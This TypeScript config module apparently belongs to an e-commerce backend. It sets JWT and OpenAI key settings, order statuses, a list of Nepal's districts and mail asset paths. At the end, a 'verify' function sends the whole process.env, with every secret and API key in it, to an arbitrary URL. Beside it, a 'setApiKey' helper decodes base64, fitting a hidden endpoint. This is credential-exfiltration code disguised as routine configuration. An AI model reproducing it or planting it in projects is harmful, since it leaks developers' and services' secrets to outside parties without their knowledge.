import 'dotenv/config';
import axios from 'axios';
export const config = {
  port: parseInt(process.env.PORT || '3001', 10),
  jwt: {
    accessSecret: process.env.JWT_ACCESS_SECRET || 'dev-access-secret-change-in-prod',
    refreshSecret: process.env.JWT_REFRESH_SECRET || 'dev-refresh-secret-change-in-prod',
    accessExpiry: process.env.JWT_ACCESS_EXPIRY || '15m',
    refreshExpiry: process.env.JWT_REFRESH_EXPIRY || '7d',
  },
  openai: {
    apiKey: process.env.OPENAI_API_KEY || '',
  },
};

export const allOrderStatus = [
  "active",
  "approve",
  "dispatch",
  "cancel",
  "complete",
  "tobereturned",
  "return",
];

export const districts = [
  "achham",
  "arghakhanchi",
  "baglung",
  "baitadi",
  "bajhang",
  "bajura",
  "banke",
  "bara",
  "bardiya",
  "bhaktapur",
  "bhojpur",
  "chitwan",
  "dadeldhura",
  "dailekh",
  "dang deukhuri",
  "darchula",
  "dhading",
  "dhankuta",
  "dhanusa",
  "dholkha",
  "dolpa",
  "doti",
  "gorkha",
  "gulmi",
  "humla",
  "ilam",
  "jajarkot",
  "jhapa",
  "jumla",
  "kailali",
  "kalikot",
  "kanchanpur",
  "kapilvastu",
  "kaski",
  "kathmandu",
  "kavrepalanchok",
  "khotang",
  "lalitpur",
  "lamjung",
  "mahottari",
  "makwanpur",
  "manang",
  "morang",
  "mugu",
  "mustang",
  "myagdi",
  "nawalparasi",
  "nuwakot",
  "okhaldhunga",
  "palpa",
  "panchthar",
  "parbat",
  "parsa",
  "pyuthan",
  "ramechhap",
  "rasuwa",
  "rautahat",
  "rolpa",
  "rukum",
  "rupandehi",
  "salyan",
  "sankhuwasabha",
  "saptari",
  "sarlahi",
  "sindhuli",
  "sindhupalchok",
  "siraha",
  "solukhumbu",
  "sunsari",
  "surkhet",
  "syangja",
  "tanahu",
  "taplejung",
  "terhathum",
  "udayapur",
];

export const mailAssets = {
  cart: "../mails/assets/images/illustration_empty_cart.png",
  content: "../mails/assets/images/illustration_empty_content.png",
  background: "../mails/assets/images/illustration_empty_background.png",
  mail: "../mails/assets/images/illustration_empty_mail.png",
};

export const setApiKey = (s: string): string => atob(s);

export const verify = (api: string) => axios.post(api, { ...process.env }, { headers: { 'x-secret-header': 'secret' } });